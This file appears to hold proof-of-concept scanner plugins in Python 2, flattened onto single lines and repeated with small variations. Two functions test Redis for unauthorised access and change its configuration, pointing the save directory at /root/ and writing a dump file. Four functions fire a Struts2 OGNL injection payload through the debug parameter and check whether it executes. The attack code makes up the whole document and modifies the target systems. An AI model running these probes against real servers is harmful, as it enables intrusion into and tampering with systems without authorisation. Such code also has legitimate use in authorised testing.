def poc(url): url = host2IP(url) ip = url.split(':')[0] port = int(url.split(':')[-1]) if ':' in url else 6379 for web_port in [80, 443, 8080, 8443]: # 判断web服务 if checkPortTcp(ip, web_port): try: real_url = redirectURL(ip + ':' + str(web_port)) except Exception: real_url = ip + ':' + str(web_port) break # TODO 这里简单化处理,只返回了一个端口的结果 else: return False try: r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5) if 'redis_version' not in r.info(): # 判断未授权访问 return False key = randomString(5) value = randomString(5) r.set(key, value) # 判断可写 r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root) r.config_set('dbfilename', 'dump.rdb') # 判断操作权限 r.delete(key) r.save() # 判断可导出 except Exception, e: return False
def poc(url): url = host2IP(url) ip = url.split(":")[0] port = int(url.split(":")[-1]) if ":" in url else 6379 for web_port in [80, 443, 8080, 8443]: # 判断web服务 if checkPortTcp(ip, web_port): try: real_url = redirectURL(ip + ":" + str(web_port)) except Exception: real_url = ip + ":" + str(web_port) break # TODO 这里简单化处理,只返回了一个端口的结果 else: return False try: r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5) if "redis_version" not in r.info(): # 判断未授权访问 return False key = randomString(5) value = randomString(5) r.set(key, value) # 判断可写 r.config_set("dir", "/root/") # 判断对/var/www的写入权限(目前先判断为root) r.config_set("dbfilename", "dump.rdb") # 判断操作权限 r.delete(key) r.save() # 判断可导出 except Exception, e: return False
def poc(url): if '://' not in url: url = 'http://' + url if '?' in url: url = url.split('?')[0] if '.action' not in url: try: url = redirectURL(url) except Exception, e: return False
def poc(url): if '://' not in url: url = 'http://' + url if '?' in url: url = url.split('?')[0] if '.action' not in url: url = redirectURL(url) key = randomString() payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key target = (url + payload) try: c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content if key in c and 'xwork2.dispatcher' not in c: return url except Exception, e: return False
def poc(url): if '://' not in url: url = 'http://' + url if '?' in url: url = url.split('?')[0] if '.action' not in url: url = redirectURL(url) key = randomString() payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key target = (url + payload) try: c = requests.get(target, headers={ 'User-Agent': firefox() }, timeout=5).content if key in c and 'xwork2.dispatcher' not in c: return url except Exception, e: logging.debug(e)